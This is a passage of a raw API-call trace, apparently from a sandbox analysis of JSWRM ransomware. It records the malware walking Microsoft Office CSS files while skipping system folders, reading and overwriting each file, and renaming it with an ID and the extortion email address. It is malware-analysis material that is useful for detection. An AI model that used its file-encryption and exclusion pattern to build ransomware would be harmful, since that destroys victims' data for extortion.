[0116.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0116.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME04.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme04.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.728] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=128226) returned 1 [0116.728] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f4e0) returned 0x24c1d0 [0116.728] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f4e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f4e0, lpOverlapped=0x0) returned 1 [0116.737] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.737] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f4e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f4e0, lpOverlapped=0x0) returned 1 [0116.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.737] CloseHandle (hObject=0x314) returned 1 [0116.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0116.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0116.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0116.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0116.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0116.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0116.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0116.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0116.738] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME04.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme04.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME04.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme04.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0116.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0116.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0116.739] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab02bf1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab02bf1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1edba, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME05.CSS", cAlternateFileName="")) returned 1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2=".") returned 1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="..") returned 1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="...") returned 1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="windows") returned -1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="recovery") returned 1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="perflogs") returned 1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="documents and settings") returned 1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="system volume information") returned -1 [0116.739] lstrcmpiW (lpString1="SCHEME05.CSS", lpString2="msocache") returned 1 [0116.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0116.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME05.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME05.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME05.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0116.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0116.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME05.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME05.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME05.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0116.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0116.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0116.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0116.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME05.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme05.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.742] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=126394) returned 1 [0116.742] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1edb0) returned 0x24c1d0 [0116.742] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1edb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1edb0, lpOverlapped=0x0) returned 1 [0116.751] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.751] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1edb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1edb0, lpOverlapped=0x0) returned 1 [0116.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.752] CloseHandle (hObject=0x314) returned 1 [0116.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0116.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0116.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0116.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0116.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0116.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0116.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.752] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME05.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme05.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME05.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme05.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0116.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0116.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0116.753] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab02bf1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab02bf1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f2da, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME06.CSS", cAlternateFileName="")) returned 1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2=".") returned 1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="..") returned 1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="...") returned 1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="windows") returned -1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="recovery") returned 1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="perflogs") returned 1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="documents and settings") returned 1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="system volume information") returned -1 [0116.753] lstrcmpiW (lpString1="SCHEME06.CSS", lpString2="msocache") returned 1 [0116.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0116.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME06.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME06.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME06.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0116.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0116.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME06.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME06.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME06.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0116.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0116.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0116.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0116.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME06.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme06.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.754] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=127706) returned 1 [0116.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f2d0) returned 0x24c1d0 [0116.755] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f2d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f2d0, lpOverlapped=0x0) returned 1 [0116.764] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.764] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f2d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f2d0, lpOverlapped=0x0) returned 1 [0116.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.764] CloseHandle (hObject=0x314) returned 1 [0116.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0116.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0116.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0116.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0116.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0116.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0116.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.765] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME06.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme06.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME06.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme06.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0116.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0116.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0116.766] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab02bf1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab02bf1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ff56, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME07.CSS", cAlternateFileName="")) returned 1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2=".") returned 1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="..") returned 1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="...") returned 1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="windows") returned -1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="recovery") returned 1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="perflogs") returned 1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="documents and settings") returned 1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="system volume information") returned -1 [0116.766] lstrcmpiW (lpString1="SCHEME07.CSS", lpString2="msocache") returned 1 [0116.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0116.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME07.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME07.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME07.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0116.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME07.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME07.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME07.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0116.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0116.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0116.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME07.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme07.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.767] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=130902) returned 1 [0116.767] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ff50) returned 0x24c1d0 [0116.767] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1ff50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1ff50, lpOverlapped=0x0) returned 1 [0116.776] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.776] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1ff50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1ff50, lpOverlapped=0x0) returned 